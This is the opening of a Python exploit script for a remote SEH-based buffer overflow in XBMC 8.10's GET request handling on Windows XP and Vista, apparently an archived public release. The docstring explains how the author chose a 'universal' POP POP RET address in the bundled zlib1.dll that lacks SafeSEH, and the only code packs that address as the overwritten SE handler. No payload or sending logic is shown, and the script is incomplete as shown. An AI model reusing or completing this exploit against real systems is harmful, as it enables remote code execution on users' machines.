XBMC 8.10 GET Request Remote Buffer Overflow Exploit (SEH) (univ)
#!/usr/bin/env python
'''
Xbmc get request remote buffer overflow 8.10 *seh*(Universal address)!!
Tested:Win xp sp2 eng Win vista sp1
Vendor url:http://xbmc.org/
Release date:April the 4th 2009
versions affected: windows all versions.
I had tried awhile to get a nice pop ebx pop ret address and just
could not find a suitable one especially that was any good.and it
had to be shipped with the application and not have /safe seh.
To start with i looked at the zlib.dll to see of there were any
nice pop pop ret address i noticed there was one in particular that
stood out and decided to try it.
There is no need for me to release any more exploits for this application
as i have covered all the areas which i wanted to and want to
move on from this.
If your interested to see how this worked attach a debugger and add some
hit tracing :).It is possible to use this with all the buffer overflows
i released.
Credits to n00b for finding the buffer overflow and writing
exploit.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''
###
###This was found in the module zlib1 and is universal.
#62E83BAC 5B POP EBX
#62E83BAD 5D POP EBP
#62E83BAE ^E9 CDD9FFFF JMP zlib1.compressBound
SE_Handler = struct.pack('<L',0x62E83BAC)